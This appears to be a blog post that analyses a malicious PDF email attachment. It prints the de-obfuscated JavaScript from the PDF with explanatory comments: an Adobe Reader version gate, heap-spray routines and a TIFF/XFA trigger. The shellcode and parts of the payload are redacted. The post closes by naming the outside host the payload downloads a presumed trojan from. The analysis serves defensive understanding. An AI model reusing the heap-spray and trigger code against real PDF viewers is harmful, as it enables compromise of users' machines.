Decoding a PDF Virus E-Mail 

Today I received a malicious email via gmail.

Title: “Check this. It might be useful for u.”
From: XXXX@aol.com via mx.aol.com 11:55 AM (2 hours ago) to Nick

With some garbled HTML data in the text area and a MIME PDF attachment “621624.pdf”

The email came from someone who must have had me in their address book, as I had communicated with them years ago.

Of course I had to investigate and uploaded the pdf to jeek.org for further analysis.

http://jsunpack.jeek.org/?report=4696a30d0b4b840770048971815fa6f85840a960

The PDF contained a hidden javascript package which was further obfuscated.

After manually de-obfuscating the code I came up with:

// Outer obfuscation layer: every "%" of a percent-escaped (%XX / %uXXXX)
// payload was swapped for the marker "a3tf31jre". Restoring the "%" and
// running unescape() on the result yields the script listed below.
var encoded = "a3tf31jre0........." (redacted)
var decode1 = encoded.replace(/a3tf31jre/g,"%");
var decoded = unescape(decode1);

The encoded string decodes to:

// Global array used as the heap-spray container: heap_spray3() overwrites
// it with 0x190 large strings, so the four initial numbers are placeholders.
var j_IgC = [31, 31, 15, 23];

/**
 * Indirection around the host's global `app` object (in Acrobat/Reader
 * JavaScript this is the viewer application object; get_ver() reads
 * viewerVersion from it). The odd name is obfuscation, not semantics.
 * @returns {object} the global app object
 */
function _k_m()
{
  var host = app;
  return host;
}


/**
 * Thin wrapper around unescape(): decodes %XX and %uXXXX sequences in the
 * argument and returns the resulting string.
 * @param {string} xVgFqV - percent-escaped input
 * @returns {string} the decoded string
 */
function _b_(xVgFqV)
{
  return unescape(xVgFqV);
}


/**
 * Normalises the stringified app.viewerVersion into a four-digit integer used
 * by the version gates in exploit() (e.g. "9.3" -> "93" -> "9300" -> 9300).
 * Quirk: replace(".", "") has no /g flag, so only the first dot is removed;
 * a three-part version such as "9.1.2" becomes "91.2" (already 4 chars, no
 * padding) and parseInt() yields 91, which fails the `ver >= 8000` gate.
 * Useful to know when determining which viewer builds the payload fires on.
 * @returns {number} four-digit version number
 */
function get_ver()
{
var ver = _k_m().viewerVersion.toString();
ver = ver.replace(".", "");
while (ver.length < 4)
{
ver += "0";
}
ver = parseInt(ver, 10);
return ver;
}

/**
 * Builds a string of len/2 UTF-16 units (i.e. `len` bytes) by repeatedly
 * doubling the seed and then truncating. A seed of "" never terminates.
 * @param {string} xVgFqV - seed string
 * @param {number} len - target size in bytes (two per UTF-16 unit)
 * @returns {string} the seed repeated and cut to len/2 units
 */
function make_block(xVgFqV, len)
{
  var half = len / 2;
  var chunk = xVgFqV;
  while (chunk.length < half) {
    chunk = chunk + chunk;
  }
  return chunk.substring(0, half);
}

/**
 * Heap spray. Decodes the %u-escaped shellcode, pads it with %u9090 (two
 * 0x90 bytes) filler so that shellcode + filler spans 0x2000 bytes, repeats
 * that pattern up to 0x80000 - 0x40 bytes, and stores 0x190 (400) copies in
 * the global j_IgC array so large parts of the viewer's heap hold the payload.
 * Each stored copy drops its last unit and re-appends one filler unit, which
 * keeps the size constant while ending every block in filler.
 * Defensive note: hundreds of near-identical, multi-hundred-KB strings built
 * by self-concatenation in a loop is a characteristic signature of PDF
 * JavaScript heap sprays for both static scanners and sandboxes.
 * @param {string} scode - %u-escaped shellcode as produced by str2uni()
 */
function heap_spray3(scode)
{
scode = _b_(scode);
var sclen = scode.length * 2;
var fasdds = _b_("%u9090");
var spray = make_block(fasdds,0x2000 - sclen);
var block = scode + spray;
block = make_block(block,0x80000 - 0x40);
for (var i = 0;i<0x190;i ++)
{
j_IgC[i] = block.substr(0,block.length - 1) + fasdds;
}
return;
}


/**
 * Repeats the seed by doubling until it is at least `len` characters long,
 * then truncates to exactly `len`. A seed of "" never terminates.
 * @param {string} xVgFqV - seed string
 * @param {number} len - target length in UTF-16 units
 * @returns {string} the repeated seed cut to `len` units
 */
function make_str(xVgFqV,len)
{
  var out = xVgFqV;
  for (; out.length < len;) {
    out = out + out;
  }
  return out.substring(0, len);
}


/**
 * Formats a number as lowercase hex, left-padding with one "0" when the
 * digit count is odd so the result always has an even number of digits.
 * @param {number} num - value to format
 * @returns {string} even-length hex string
 */
function num2hex(num)
{
  var hex = num.toString(16);
  if (hex.length % 2 !== 0) {
    hex = "0" + hex;
  }
  return hex;
}

/**
 * Re-encodes a byte string as %uXXXX escapes, two input characters per
 * escape with the second character in the high byte (little-endian order).
 * An odd-length input yields a trailing "0NaN" high byte, exactly as the
 * original code did. Hex conversion is inlined (same padding rule as num2hex).
 * @param {string} xVgFqV - raw byte string (one byte per character)
 * @returns {string} %u-escaped representation
 */
function str2uni(xVgFqV)
{
  var parts = [];
  for (var i = 0; i < xVgFqV.length; i += 2) {
    var hi = xVgFqV.charCodeAt(i + 1).toString(16);
    var lo = xVgFqV.charCodeAt(i).toString(16);
    if (hi.length % 2) { hi = "0" + hi; }
    if (lo.length % 2) { lo = "0" + lo; }
    parts.push("%u" + hi + lo);
  }
  return parts.join("");
}

/**
 * Converts a hex string ("4142") into the raw string of the bytes it encodes
 * ("AB"), two hex digits per output character.
 * @param {string} hex - hex digits, even length expected
 * @returns {string} decoded byte string
 */
function hex2str(hex)
{
var ret = "";
for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; }
// Entry point; the call precedes the declaration and relies on hoisting.
exploit();
/**
 * Version-gated trigger. Viewer builds reporting 8.0 or newer get a payload;
 * the `ver < 8201` branch (before 8.2.1) and the else branch select different
 * `foot` / shellcode pairs, i.e. two variants for two viewer generations.
 * `ret` is base64: "SUkq" decodes to "II*" (a little-endian TIFF header),
 * "QUFB" decodes to "AAA" padding, followed by a redacted tail. It is assigned
 * to pwzh6lr.rawValue — presumably an XFA form field that the viewer decodes
 * as an image (not shown here; confirm against the PDF's XFA form). The
 * shellcode is hex-decoded, %u-encoded and heap-sprayed beforehand so it is
 * resident when the malformed image is processed.
 * Several lines below were redacted by the post's author and are not valid
 * JavaScript as printed.
 */
function exploit() { var ver = get_ver(); if (ver >= 8000)
{
var tiff = "SUkqADggAABB";
var nops = make_str("QUFB",0x2ae8);
var start "..."; (redacted)
var foot = "";
var sc_hex = "";

if (ver < 8201)
{
foot = "..."; (redacted)
// `var sc_hex` is re-declared here; harmless since var is function-scoped.
var sc_hex = "..."; (redacted)
}
else
{
foot = "..."; (redacted)
sc_hex = "..."; (redacted)
}

// Only proceeds when one of the branches above selected a payload.
if (foot.length)
{
var ret = [tiff,nops,start,foot].join("");
var sc_str = hex2str(sc_hex);
var scode = str2uni(sc_str);
heap_spray3(scode);
pwzh6lr.rawValue = ret;
}
}
}

After the PDF viewer is “heap sprayed” ( http://en.wikipedia.org/wiki/Heap_spraying ) the injected exploit payload goes out to download http://earthexplore.com/PDFS/XXXXXXX.exe (redacted). I have not analyzed the executable itself but would imagine that it is some sort of trojan.